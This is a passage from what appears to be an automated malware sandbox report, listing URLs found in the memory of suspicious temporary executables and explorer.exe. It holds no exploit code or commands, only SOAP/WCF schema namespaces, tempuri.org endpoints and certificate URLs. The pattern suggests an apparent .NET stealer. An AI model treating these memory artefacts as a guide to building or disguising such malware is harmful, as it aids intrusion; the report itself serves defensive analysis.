                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: explorer.exe, 00000005.00000000.1532633049.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2787968752.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                    Source: explorer.exe, 00000005.00000000.1535548358.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2289211042.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2175043198.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2794027195.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: explorer.exe, 00000005.00000002.2793022789.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: 4F82.tmp.zx.exe, 0000000D.00000002.1742366761.00007FFBAA8DD000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel$
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModeld
                    Source: explorer.exe, 00000005.00000000.1534506851.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2791299993.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1531993799.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.000000000328C000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.000000000328C000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
